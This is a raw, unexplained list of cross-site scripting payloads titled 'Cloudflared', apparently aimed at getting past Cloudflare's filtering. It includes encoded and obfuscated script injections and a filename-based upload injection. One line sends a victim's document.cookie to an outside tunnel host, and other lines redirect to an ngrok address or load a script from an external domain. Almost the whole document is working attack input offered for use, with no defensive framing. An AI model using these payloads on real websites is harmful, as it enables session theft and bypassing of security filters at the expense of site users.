Cloudflared

‘>alert(154)</script><script/154=’;;;;;;;

"><img src=x onerrora=confirm() onerror=confirm(1)>

touch '"><img src=x onerror=alert("xss!")>.pdf' fileupload

<button onclick="window.location.href='https://67b0-2406-8800-80-859d-85bb-207d-1ea7-7e76.ngrok-free.app'">Click me</button>

```"><img src=1 onerror=document.location=“https://2737d51a05b8b0.lhr.life/?”+document.cookie>```

"><img src=x onerror=alert(1)>

"><img src=x onerror=prompt(/hello_pepsi/)>

https://www.geeksforgeeks.org/tag/php-questions/page/7/?type="><img src=1 onerror=alert(1)>.gif

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-Dedi')>

"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>

'<<k>/script><<k>script>eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))<<k>/script>

<svg onload=alert&#0000000040"1")><””>

"\/>

<img%20s+src+c=x%20on+onerror+%20="alert(1)"\>

For email

a7madn1@gmail.com'\"><svg/onload=alert(/xss/)>
